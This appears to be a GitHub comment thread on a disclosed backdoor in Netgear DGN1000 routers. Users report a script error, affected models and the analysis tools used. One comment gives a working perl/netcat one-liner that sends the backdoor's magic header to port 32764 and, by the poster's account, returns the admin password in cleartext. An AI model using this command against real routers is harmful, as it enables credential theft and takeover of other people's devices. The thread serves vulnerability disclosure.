DGN1000

[grigio]

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.

[elvanderb]

I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

[teetaucher]

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

[elvanderb]

Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

[grigio]

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported

[elvanderb]

No, sorry :)

[teetaucher]

Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.